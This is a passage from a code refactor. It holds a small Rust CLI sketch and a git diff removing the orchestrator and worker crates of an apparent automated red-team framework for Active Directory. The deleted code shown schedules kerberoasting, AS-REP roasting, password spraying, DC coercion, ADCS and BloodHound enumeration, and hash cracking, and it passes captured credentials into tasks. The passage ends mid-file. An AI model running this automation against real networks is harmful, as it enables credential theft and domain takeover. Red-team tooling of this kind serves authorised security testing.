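// and `worker` (assumed enabled by default) and the run_* helpers are
// illustrative placeholders, not the actual ares-cli internals.
use clap::{Parser, Subcommand};

#[derive(Parser)]
#[command(name = "ares", version)]
struct Cli {
    #[command(subcommand)]
    command: Command,
}

#[derive(Subcommand)]
enum Command {
    /// Long-lived orchestration loop (formerly the ares-orchestrator binary).
    #[cfg(feature = "orchestrator")]
    Orchestrator {
        /// Redis connection string used for task dispatch.
        #[arg(long, default_value = "redis://localhost:6379")]
        redis_url: String,
    },
    /// Task-polling worker daemon (formerly the ares-worker binary).
    #[cfg(feature = "worker")]
    Worker {
        /// Redis connection string to poll for tasks.
        #[arg(long, default_value = "redis://localhost:6379")]
        redis_url: String,
    },
}

fn main() {
    match Cli::parse().command {
        #[cfg(feature = "orchestrator")]
        Command::Orchestrator { redis_url } => run_orchestrator(&redis_url),
        #[cfg(feature = "worker")]
        Command::Worker { redis_url } => run_worker(&redis_url),
    }
}

#[cfg(feature = "orchestrator")]
fn run_orchestrator(redis_url: &str) {
    // Stand-in for the orchestration loop: task dispatch, state, monitoring.
    println!("orchestrator connecting to {redis_url}");
}

#[cfg(feature = "worker")]
fn run_worker(redis_url: &str) {
    // Stand-in for the worker loop: poll Redis, execute tools, heartbeat.
    println!("worker polling {redis_url}");
}
```

With this shape, `ares orchestrator` and `ares worker` reproduce the old binary entry points, which is why process probes such as `pgrep -f 'ares worker'` match the new command line.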
--- ares-orchestrator/Cargo.toml | 34 - ares-orchestrator/src/automation/acl.rs | 149 ---- ares-orchestrator/src/automation/adcs.rs | 79 -- .../src/automation/bloodhound.rs | 81 -- ares-orchestrator/src/automation/coercion.rs | 78 -- ares-orchestrator/src/automation/crack.rs | 75 -- .../src/automation/credential_access.rs | 479 ----------- .../src/automation/credential_expansion.rs | 410 ---------- .../src/automation/delegation.rs | 103 --- ares-orchestrator/src/automation/gmsa.rs | 145 ---- .../src/automation/golden_ticket.rs | 295 ------- ares-orchestrator/src/automation/mod.rs | 64 -- ares-orchestrator/src/automation/mssql.rs | 94 --- ares-orchestrator/src/automation/refresh.rs | 32 - ares-orchestrator/src/automation/s4u.rs | 354 -------- .../src/automation/secretsdump.rs | 98 --- .../src/automation/share_enum.rs | 106 --- ares-orchestrator/src/automation/shares.rs | 82 -- .../src/automation/stall_detection.rs | 248 ------ ares-orchestrator/src/automation/trust.rs | 448 ----------- .../src/automation/unconstrained.rs | 385 --------- ares-orchestrator/src/automation_spawner.rs | 47 -- ares-orchestrator/src/blue/auto_submit.rs | 246 ------ ares-orchestrator/src/blue/callbacks.rs | 621 --------------- ares-orchestrator/src/blue/chaining.rs | 598 -------------- ares-orchestrator/src/blue/investigation.rs | 572 ------------- ares-orchestrator/src/blue/mod.rs | 19 - ares-orchestrator/src/blue/runner.rs | 403 ---------- ares-orchestrator/src/blue/sub_agent.rs | 142 ---- ares-orchestrator/src/bootstrap.rs | 164 ---- .../src/callback_handler/dispatch.rs | 251 ------ ares-orchestrator/src/callback_handler/mod.rs | 111 --- .../src/callback_handler/query.rs | 318 -------- .../src/callback_handler/tests.rs | 547 ------------- ares-orchestrator/src/completion.rs | 492 ------------ ares-orchestrator/src/config.rs | 365 --------- ares-orchestrator/src/cost_summary.rs | 87 -- ares-orchestrator/src/deferred.rs | 393 --------- ares-orchestrator/src/dispatcher/mod.rs | 132 --- .../src/dispatcher/submission.rs | 450 ----------- .../src/dispatcher/task_builders.rs | 463 ----------- ares-orchestrator/src/exploitation.rs | 196 ----- ares-orchestrator/src/llm_runner.rs | 372 --------- ares-orchestrator/src/main.rs | 753 ------------------ ares-orchestrator/src/monitoring.rs | 471 ----------- .../src/output_extraction/hashes.rs | 308 ------- .../src/output_extraction/hosts.rs | 108 --- .../src/output_extraction/mod.rs | 160 ---- .../src/output_extraction/passwords.rs | 178 ----- .../src/output_extraction/shares.rs | 80 -- .../src/output_extraction/tests.rs | 538 ------------- .../src/output_extraction/users.rs | 148 ---- ares-orchestrator/src/recovery/dedup.rs | 273 ------- ares-orchestrator/src/recovery/manager.rs | 256 ------ ares-orchestrator/src/recovery/mod.rs | 440 ---------- ares-orchestrator/src/recovery/normalize.rs | 171 ---- ares-orchestrator/src/recovery/requeue.rs | 57 -- .../src/recovery/resume_helper.rs | 165 ---- ares-orchestrator/src/recovery/types.rs | 127 --- .../src/result_processing/admin_checks.rs | 328 -------- .../result_processing/discovery_polling.rs | 190 ----- .../src/result_processing/mod.rs | 611 -------------- .../src/result_processing/parsing.rs | 159 ---- .../src/result_processing/tests.rs | 211 ----- .../src/result_processing/timeline.rs | 100 --- ares-orchestrator/src/results.rs | 185 ----- ares-orchestrator/src/routing.rs | 258 ------ ares-orchestrator/src/state/dedup.rs | 69 -- ares-orchestrator/src/state/inner.rs | 377 --------- ares-orchestrator/src/state/mod.rs | 75 -- 
ares-orchestrator/src/state/persistence.rs | 330 -------- .../src/state/publishing/credentials.rs | 221 ----- .../src/state/publishing/entities.rs | 252 ------ .../src/state/publishing/hosts.rs | 342 -------- .../src/state/publishing/milestones.rs | 156 ---- ares-orchestrator/src/state/publishing/mod.rs | 117 --- ares-orchestrator/src/state/shared.rs | 234 ------ ares-orchestrator/src/task_queue.rs | 488 ------------ ares-orchestrator/src/throttling.rs | 440 ---------- .../src/tool_dispatcher/auth_throttle.rs | 88 -- .../src/tool_dispatcher/local.rs | 91 --- ares-orchestrator/src/tool_dispatcher/mod.rs | 228 ------ .../src/tool_dispatcher/redis_dispatcher.rs | 165 ---- .../src/tool_dispatcher/tests.rs | 98 --- ares-worker/Cargo.toml | 33 - ares-worker/build.rs | 95 --- ares-worker/src/blue_task_loop.rs | 385 --------- ares-worker/src/config.rs | 199 ----- ares-worker/src/heartbeat.rs | 155 ---- ares-worker/src/hosts.rs | 238 ------ ares-worker/src/main.rs | 161 ---- ares-worker/src/task_loop/executor.rs | 415 ---------- ares-worker/src/task_loop/mod.rs | 236 ------ ares-worker/src/task_loop/result_handler.rs | 215 ----- ares-worker/src/task_loop/types.rs | 180 ----- ares-worker/src/tool_check.rs | 273 ------- ares-worker/src/tool_executor.rs | 452 ----------- 97 files changed, 23911 deletions(-) delete mode 100644 ares-orchestrator/Cargo.toml delete mode 100644 ares-orchestrator/src/automation/acl.rs delete mode 100644 ares-orchestrator/src/automation/adcs.rs delete mode 100644 ares-orchestrator/src/automation/bloodhound.rs delete mode 100644 ares-orchestrator/src/automation/coercion.rs delete mode 100644 ares-orchestrator/src/automation/crack.rs delete mode 100644 ares-orchestrator/src/automation/credential_access.rs delete mode 100644 ares-orchestrator/src/automation/credential_expansion.rs delete mode 100644 ares-orchestrator/src/automation/delegation.rs delete mode 100644 ares-orchestrator/src/automation/gmsa.rs delete mode 100644 ares-orchestrator/src/automation/golden_ticket.rs delete mode 100644 ares-orchestrator/src/automation/mod.rs delete mode 100644 ares-orchestrator/src/automation/mssql.rs delete mode 100644 ares-orchestrator/src/automation/refresh.rs delete mode 100644 ares-orchestrator/src/automation/s4u.rs delete mode 100644 ares-orchestrator/src/automation/secretsdump.rs delete mode 100644 ares-orchestrator/src/automation/share_enum.rs delete mode 100644 ares-orchestrator/src/automation/shares.rs delete mode 100644 ares-orchestrator/src/automation/stall_detection.rs delete mode 100644 ares-orchestrator/src/automation/trust.rs delete mode 100644 ares-orchestrator/src/automation/unconstrained.rs delete mode 100644 ares-orchestrator/src/automation_spawner.rs delete mode 100644 ares-orchestrator/src/blue/auto_submit.rs delete mode 100644 ares-orchestrator/src/blue/callbacks.rs delete mode 100644 ares-orchestrator/src/blue/chaining.rs delete mode 100644 ares-orchestrator/src/blue/investigation.rs delete mode 100644 ares-orchestrator/src/blue/mod.rs delete mode 100644 ares-orchestrator/src/blue/runner.rs delete mode 100644 ares-orchestrator/src/blue/sub_agent.rs delete mode 100644 ares-orchestrator/src/bootstrap.rs delete mode 100644 ares-orchestrator/src/callback_handler/dispatch.rs delete mode 100644 ares-orchestrator/src/callback_handler/mod.rs delete mode 100644 ares-orchestrator/src/callback_handler/query.rs delete mode 100644 ares-orchestrator/src/callback_handler/tests.rs delete mode 100644 ares-orchestrator/src/completion.rs delete mode 100644 
ares-orchestrator/src/config.rs delete mode 100644 ares-orchestrator/src/cost_summary.rs delete mode 100644 ares-orchestrator/src/deferred.rs delete mode 100644 ares-orchestrator/src/dispatcher/mod.rs delete mode 100644 ares-orchestrator/src/dispatcher/submission.rs delete mode 100644 ares-orchestrator/src/dispatcher/task_builders.rs delete mode 100644 ares-orchestrator/src/exploitation.rs delete mode 100644 ares-orchestrator/src/llm_runner.rs delete mode 100644 ares-orchestrator/src/main.rs delete mode 100644 ares-orchestrator/src/monitoring.rs delete mode 100644 ares-orchestrator/src/output_extraction/hashes.rs delete mode 100644 ares-orchestrator/src/output_extraction/hosts.rs delete mode 100644 ares-orchestrator/src/output_extraction/mod.rs delete mode 100644 ares-orchestrator/src/output_extraction/passwords.rs delete mode 100644 ares-orchestrator/src/output_extraction/shares.rs delete mode 100644 ares-orchestrator/src/output_extraction/tests.rs delete mode 100644 ares-orchestrator/src/output_extraction/users.rs delete mode 100644 ares-orchestrator/src/recovery/dedup.rs delete mode 100644 ares-orchestrator/src/recovery/manager.rs delete mode 100644 ares-orchestrator/src/recovery/mod.rs delete mode 100644 ares-orchestrator/src/recovery/normalize.rs delete mode 100644 ares-orchestrator/src/recovery/requeue.rs delete mode 100644 ares-orchestrator/src/recovery/resume_helper.rs delete mode 100644 ares-orchestrator/src/recovery/types.rs delete mode 100644 ares-orchestrator/src/result_processing/admin_checks.rs delete mode 100644 ares-orchestrator/src/result_processing/discovery_polling.rs delete mode 100644 ares-orchestrator/src/result_processing/mod.rs delete mode 100644 ares-orchestrator/src/result_processing/parsing.rs delete mode 100644 ares-orchestrator/src/result_processing/tests.rs delete mode 100644 ares-orchestrator/src/result_processing/timeline.rs delete mode 100644 ares-orchestrator/src/results.rs delete mode 100644 ares-orchestrator/src/routing.rs delete mode 100644 ares-orchestrator/src/state/dedup.rs delete mode 100644 ares-orchestrator/src/state/inner.rs delete mode 100644 ares-orchestrator/src/state/mod.rs delete mode 100644 ares-orchestrator/src/state/persistence.rs delete mode 100644 ares-orchestrator/src/state/publishing/credentials.rs delete mode 100644 ares-orchestrator/src/state/publishing/entities.rs delete mode 100644 ares-orchestrator/src/state/publishing/hosts.rs delete mode 100644 ares-orchestrator/src/state/publishing/milestones.rs delete mode 100644 ares-orchestrator/src/state/publishing/mod.rs delete mode 100644 ares-orchestrator/src/state/shared.rs delete mode 100644 ares-orchestrator/src/task_queue.rs delete mode 100644 ares-orchestrator/src/throttling.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/auth_throttle.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/local.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/mod.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs delete mode 100644 ares-orchestrator/src/tool_dispatcher/tests.rs delete mode 100644 ares-worker/Cargo.toml delete mode 100644 ares-worker/build.rs delete mode 100644 ares-worker/src/blue_task_loop.rs delete mode 100644 ares-worker/src/config.rs delete mode 100644 ares-worker/src/heartbeat.rs delete mode 100644 ares-worker/src/hosts.rs delete mode 100644 ares-worker/src/main.rs delete mode 100644 ares-worker/src/task_loop/executor.rs delete mode 100644 ares-worker/src/task_loop/mod.rs delete mode 100644 
ares-worker/src/task_loop/result_handler.rs delete mode 100644 ares-worker/src/task_loop/types.rs delete mode 100644 ares-worker/src/tool_check.rs delete mode 100644 ares-worker/src/tool_executor.rs diff --git a/ares-orchestrator/Cargo.toml b/ares-orchestrator/Cargo.toml deleted file mode 100644 index d8187afb..00000000 --- a/ares-orchestrator/Cargo.toml +++ /dev/null @@ -1,34 +0,0 @@ -[package] -name = "ares-orchestrator" -version = "0.1.0" -edition = "2021" -description = "Rust-native orchestration loop for the Ares red team system" - -[[bin]] -name = "ares-orchestrator" -path = "src/main.rs" - -[features] -default = ["blue"] -blue = ["ares-core/blue", "ares-llm/blue", "ares-tools/blue"] - -[dependencies] -ares-core = { path = "../ares-core", features = ["telemetry"] } -ares-llm = { path = "../ares-llm" } -ares-tools = { path = "../ares-tools" } -serde = { workspace = true } -serde_json = { workspace = true } -serde_yaml = { workspace = true } -tokio = { workspace = true } -redis = { workspace = true } -chrono = { workspace = true } -tracing = { workspace = true } -tracing-subscriber = { workspace = true } -anyhow = { workspace = true } -uuid = { workspace = true } -async-trait = "0.1" -regex = { workspace = true } - -[dev-dependencies] -tokio = { workspace = true } -rstest = "0.26" diff --git a/ares-orchestrator/src/automation/acl.rs b/ares-orchestrator/src/automation/acl.rs deleted file mode 100644 index 1d34c35a..00000000 --- a/ares-orchestrator/src/automation/acl.rs +++ /dev/null @@ -1,149 +0,0 @@ -//! auto_acl_chain_follow -- dispatch ACL chain steps using available creds. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Follows ACL chains from BloodHound results, dispatching each step when -/// credentials for the source user are available. -/// Interval: 30s. Each chain is a JSON array of steps; we find the first -/// undispatched step whose source user has known credentials and dispatch it. -pub async fn auto_acl_chain_follow( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Skip if domain admin already achieved - { - let state = dispatcher.state.read().await; - if state.has_domain_admin { - continue; - } - } - - // Collect work items: (dedup_key, chain_step, credential) - let work: Vec<(String, serde_json::Value, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - - if state.acl_chains.is_empty() { - continue; - } - - let mut items = Vec::new(); - - for (chain_idx, chain) in state.acl_chains.iter().enumerate() { - // Each chain is expected to be a JSON array of step objects - let steps = match chain.as_array() { - Some(s) => s, - None => { - // Or it might be an object with a "steps" field - match chain.get("steps").and_then(|v| v.as_array()) { - Some(s) => s, - None => continue, - } - } - }; - - for (step_idx, step) in steps.iter().enumerate() { - let dedup_key = format!("chain:{}:step:{}", chain_idx, step_idx); - - // Skip already dispatched steps - if state.dispatched_acl_steps.contains(&dedup_key) { - continue; - } - if state.is_processed(DEDUP_ACL_STEPS, &dedup_key) { - continue; - } - - // Get the source user for this step - let source_user = step - .get("source") - .or_else(|| step.get("source_user")) - .or_else(|| step.get("from")) - .and_then(|v| v.as_str()) - .unwrap_or(""); - let source_domain = step - .get("source_domain") - .or_else(|| step.get("domain")) - .and_then(|v| v.as_str()) - .unwrap_or(""); - - if source_user.is_empty() { - continue; - } - - // Find credential for the source user - let cred = state.credentials.iter().find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (source_domain.is_empty() - || c.domain.to_lowercase() == source_domain.to_lowercase()) - }); - - if let Some(cred) = cred { - items.push((dedup_key, step.clone(), cred.clone())); - } - - // Only dispatch the first undispatched step per chain - break; - } - } - - items - }; - - // Dispatch each collected step - for (dedup_key, step, cred) in work { - let payload = json!({ - "technique": "acl_chain_step", - "step": step, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - }); - - match dispatcher - .throttled_submit("acl_chain_step", "acl", payload, 4) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - step_key = %dedup_key, - "ACL chain step dispatched" - ); - // Mark as dispatched in both in-memory set and dedup - { - let mut state = dispatcher.state.write().await; - state.dispatched_acl_steps.insert(dedup_key.clone()); - state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone()); - } - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key) - .await; - } - Ok(None) => {} // deferred or throttled - Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/adcs.rs b/ares-orchestrator/src/automation/adcs.rs deleted file mode 100644 index fb8654ac..00000000 --- a/ares-orchestrator/src/automation/adcs.rs +++ /dev/null @@ -1,79 +0,0 @@ -//! auto_adcs_enumeration -- detect ADCS servers via CertEnroll share. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. -/// Interval: 30s. Matches Python `_auto_adcs_enumeration`. 
-pub async fn auto_adcs_enumeration( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Find CertEnroll shares on unprocessed hosts + get a credential - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => c.clone(), - None => continue, - }; - state - .shares - .iter() - .filter(|s| s.name.to_lowercase() == "certenroll") - .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) - .map(|s| { - let domain = state.domains.first().cloned().unwrap_or_default(); - (s.host.clone(), domain, cred.clone()) - }) - .collect() - }; - - for (host_ip, domain, cred) in work { - match dispatcher - .request_certipy_find(&host_ip, &domain, &cred) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch ADCS enumeration"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/bloodhound.rs b/ares-orchestrator/src/automation/bloodhound.rs deleted file mode 100644 index c32794ea..00000000 --- a/ares-orchestrator/src/automation/bloodhound.rs +++ /dev/null @@ -1,81 +0,0 @@ -//! auto_bloodhound -- BloodHound collection per domain. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use ares_llm::routing::find_domain_credential; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches BloodHound collection for each discovered domain. -/// Interval: 30s. Matches Python `_auto_bloodhound`. -/// -/// Selects the best credential per domain (same-domain preferred, with -/// trust-scope enforcement) instead of using a single global credential. -pub async fn auto_bloodhound(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - if state.credentials.is_empty() { - continue; - } - - state - .domains - .iter() - .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d)) - .filter_map(|domain| { - let dc_ip = state.domain_controllers.get(domain).cloned()?; - // Select best credential for this specific domain - let cred = find_domain_credential( - domain, - &state.credentials, - &state.netbios_to_fqdn, - &state.trusted_domains, - ); - match cred { - Some(c) => Some((domain.clone(), dc_ip, c.clone())), - None => { - debug!(domain = %domain, "No valid credential for BloodHound"); - None - } - } - }) - .collect() - }; - - for (domain, dc_ip, cred) in work { - match dispatcher.request_bloodhound(&domain, &dc_ip, &cred).await { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "BloodHound collection dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_BLOODHOUND_DOMAINS, domain.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_BLOODHOUND_DOMAINS, &domain) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch BloodHound"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/coercion.rs b/ares-orchestrator/src/automation/coercion.rs deleted file mode 100644 index bcd83114..00000000 --- a/ares-orchestrator/src/automation/coercion.rs +++ /dev/null @@ -1,78 +0,0 @@ -//! auto_coercion -- trigger ESC8 relay and DC coercion. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Triggers coercion attacks when ADCS ESC8 servers or unconstrained delegation hosts exist. -/// Interval: 30s. Matches Python `_auto_coercion`. -pub async fn auto_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Coerce DCs that haven't been coerced yet - let work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - // Find any host with unconstrained delegation as a listener - let _listener = state.hosts.iter().find(|h| { - h.roles - .iter() - .any(|r| r.to_lowercase().contains("unconstrained")) - }); - - state - .domain_controllers - .iter() - .filter(|(_, dc_ip)| !state.is_processed(DEDUP_COERCED_DCS, dc_ip)) - .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) - .collect() - }; - - for (domain, dc_ip) in work { - // Find a listener IP for the coercion (any host we own) - let listener_ip = { - let state = dispatcher.state.read().await; - state.hosts.iter().find(|h| h.owned).map(|h| h.ip.clone()) - }; - - let listener = match listener_ip { - Some(ip) => ip, - None => continue, - }; - - match dispatcher - .request_coercion(&dc_ip, &listener, &["petitpotam", "printerbug"]) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, dc = %dc_ip, domain = %domain, "DC coercion dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_COERCED_DCS, dc_ip.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_COERCED_DCS, &dc_ip) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch coercion"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/crack.rs b/ares-orchestrator/src/automation/crack.rs deleted file mode 100644 index 929f746a..00000000 --- a/ares-orchestrator/src/automation/crack.rs +++ /dev/null @@ -1,75 +0,0 @@ -//! auto_crack_dispatch -- submit crack tasks for new hashes. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -use super::crack_dedup_key; - -/// Scans for uncracked hashes and submits crack tasks. -/// Interval: 15s. Matches Python `_auto_crack_dispatch`. -pub async fn auto_crack_dispatch(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(15)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Collect unprocessed hashes - let work: Vec<(String, ares_core::models::Hash)> = { - let state = dispatcher.state.read().await; - state - .hashes - .iter() - .filter(|h| h.cracked_password.is_none()) - .filter_map(|h| { - let dedup = crack_dedup_key(h); - if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { - None - } else { - Some((dedup, h.clone())) - } - }) - .collect() - }; - - // Serialize crack tasks: hashcat only allows one instance at a time. - // Skip this tick if a cracker task is already running. - if dispatcher.tracker.count_for_role("cracker").await > 0 { - debug!("Crack task already active, skipping dispatch this tick"); - continue; - } - - // Only dispatch one crack task per tick to avoid hashcat PID conflicts. - // Remaining hashes will be picked up on subsequent ticks. 
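// Worked example: crack_dedup_key() produces "{domain}:{username}:{first 32
// hex chars of the hash value}", so a sample NTLM hash for CONTOSO\svc_sql
// would dedup as "contoso.local:svc_sql:aad3b435b51404eeaad3b435b51404ee".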
- if let Some((dedup_key, hash)) = work.into_iter().next() { - match dispatcher.request_crack(&hash).await { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, hash_type = %hash.hash_type, "Crack task dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) - .await; - } - Ok(None) => {} // deferred or throttled - Err(e) => warn!(err = %e, "Failed to dispatch crack task"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/credential_access.rs b/ares-orchestrator/src/automation/credential_access.rs deleted file mode 100644 index a4a40c75..00000000 --- a/ares-orchestrator/src/automation/credential_access.rs +++ /dev/null @@ -1,479 +0,0 @@ -//! auto_credential_access -- kerberoast, AS-REP roast, password spray. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Complex credential access automation: kerberoast, AS-REP roast, password spray. -/// Interval: 15s + Notify wake. Matches Python `_auto_credential_access`. -pub async fn auto_credential_access( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let notify = dispatcher.credential_access_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(15)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // --- AS-REP Roast: one per domain (unauthenticated — no credentials required) --- - let asrep_work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - state - .domains - .iter() - .filter(|d| !state.is_processed(DEDUP_ASREP_DOMAINS, d)) - .filter_map(|domain| { - // Try DC map first, then fall back to target_ips[0] - let dc_ip = state - .domain_controllers - .get(domain) - .cloned() - .or_else(|| state.target_ips.first().cloned())?; - Some((domain.clone(), dc_ip)) - }) - .collect() - }; - - for (domain, dc_ip) in asrep_work { - let payload = json!({ - "techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"], - "target_ip": dc_ip, - "domain": domain, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 5) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "AS-REP roast dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_ASREP_DOMAINS, domain.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_ASREP_DOMAINS, &domain) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch AS-REP roast"), - } - } - - // --- Kerberoast: one per domain + credential pair --- - let kerberoast_work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty()) - // Skip delegation accounts — Kerberoast is already done with - // other creds, and burning auth on delegation accounts risks - // lockout before S4U can use them. - .filter(|c| !state.is_delegation_account(&c.username)) - // Skip quarantined credentials — locked out, retry after expiry. 
- .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - let cred_domain = cred.domain.to_lowercase(); - let dedup = format!("krb:{}:{}", cred_domain, cred.username.to_lowercase()); - if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { - return None; - } - // Exact domain match first - if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { - return Some((dedup, dc_ip, cred_domain, cred.clone())); - } - // Fallback: check child domains (e.g. cred has "contoso.local" - // but user is actually in "child.contoso.local") - let suffix = format!(".{cred_domain}"); - for (domain, dc_ip) in &state.domain_controllers { - if domain.ends_with(&suffix) { - debug!( - cred_domain = %cred_domain, - child_domain = %domain, - "Kerberoast: using child domain DC for parent-domain credential" - ); - return Some((dedup, dc_ip.clone(), domain.clone(), cred.clone())); - } - } - // Last resort: use target_ips[0] if DC map has no entry for this domain - if let Some(fallback_ip) = state.target_ips.first().cloned() { - debug!( - cred_domain = %cred_domain, - fallback_ip = %fallback_ip, - "Kerberoast: using target IP fallback (no DC in map)" - ); - return Some((dedup, fallback_ip, cred_domain, cred.clone())); - } - None - }) - .take(2) - .collect() - }; - - for (dedup_key, dc_ip, resolved_domain, cred) in kerberoast_work { - match dispatcher - .request_credential_access("kerberoast", &dc_ip, &resolved_domain, &cred, 5) - .await - { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, domain = %resolved_domain, "Kerberoast dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch kerberoast"), - } - } - - // --- Password spray: username-as-password --- - let spray_work: Vec<(String, String, String)> = { - let state = dispatcher.state.read().await; - state - .users - .iter() - .filter(|u| !u.domain.is_empty()) - // Skip delegation accounts — their auth budget is reserved for - // S4U exploitation. Spraying them causes lockout before S4U fires. 
